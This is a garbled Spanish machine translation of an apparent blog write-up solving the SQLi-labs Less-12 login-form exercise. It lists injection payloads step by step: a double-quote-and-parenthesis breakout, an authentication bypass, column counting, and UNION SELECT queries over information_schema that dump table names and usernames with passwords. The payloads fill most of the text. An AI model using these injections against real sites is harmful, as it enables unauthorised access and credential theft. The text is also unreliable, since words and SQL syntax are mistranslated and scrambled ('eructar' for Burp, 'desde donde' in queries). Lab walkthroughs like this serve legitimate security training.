SQLi-labs Menos-12

Menos-12 después de -Error Based - Las comillas dobles - secuencia - con giro

Menos-11 con la diferencia de que un menor-12 es una comilla comillas dobles corchetes, por menos de 12-Suite directamente a los ejercicios de eructar, paso consistente con menos-11.

0x01. Página original Aquí Insertar imagen Descripción

Aquí Insertar imagen Descripción
Los nombres de usuario y contraseñas dos parámetros fueron uname y passwd. Eructo presentó parámetros uname = xxx xxx y passwd =

0x02. Tipo de inyección Analizar

uname = 1 & passwd = 1 & submit = Enviar
Aquí Insertar imagen Descripción
uname = 1' y passwd = 1 & submit = Enviar

uname = 1" y passwd = 1 & submit = Enviar

Aquí Insertar imagen Descripción

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '1") LIMIT 0,1' at line 1

La declaración se da puede observar que el carácter de comillas dobles en la inyección de paréntesis

. Analizando el punto de inyección 0x03
intentos de contraseña universales:
. = Los uname 1 ") o los ficheros de contraseñas 1 = = 1. 1 & # = & someter la Enviar..
Aquí Insertar imagen Descripción 0x04 determina el número de campos.

uname = admin ") para un 3 y # passwd = 1 & submit = Enviar
Aquí Insertar imagen Descripción
uname = admin") para un 2 y # passwd = 1 & submit = Presentar

Consulta devuelve el número de campos es 2, pero no el número de campos en la tabla 2.

. 0x05 nombre de la base Get usuario y
las = uname 1. ") Unión seleccione un usuario (), Base de Datos () -. + Y los = passwd 1 & Enviar = la Enviar Aquí Insertar imagen Descripción
0x06 Get toda la base de datos de seguridad de nombres de tabla.
Uname = 1") union select 1 , GROUP_CONCAT (nombre_tabla ) desde donde INFORMATION_SCHEMA.TABLES esquema_tabla = 'seguridad ' # & passwd = 1 & submit = Enviar

Aquí Insertar imagen Descripción
0x07. Obtenga toda la tabla de usuarios nombres de campo
de los = uname. 1 ") Unión SELECT. 1, GROUP_CONCAT (nombre_columna) a partir de INFORMATION_SCHEMA.COLUMNS DONDE TABLE_SCHEMA = 'Seguridad' y nombre_tabla = 'usuarios' # & the = passwd. 1 y submit = la sometemos Aquí Insertar imagen Descripción
0x08. Obtiene todos los valores de los campos
uname = 1 ") union select 1 , GROUP_CONCAT (nombre de usuario, 0x3a, password) de los usuarios y # passwd = 1 & submit = Enviar

Aquí Insertar imagen Descripción

por todas partes

Publicado 15 artículos originales · ganado elogios 2 · Vistas 291

carta privada preocupaciones

Supongo que te gusta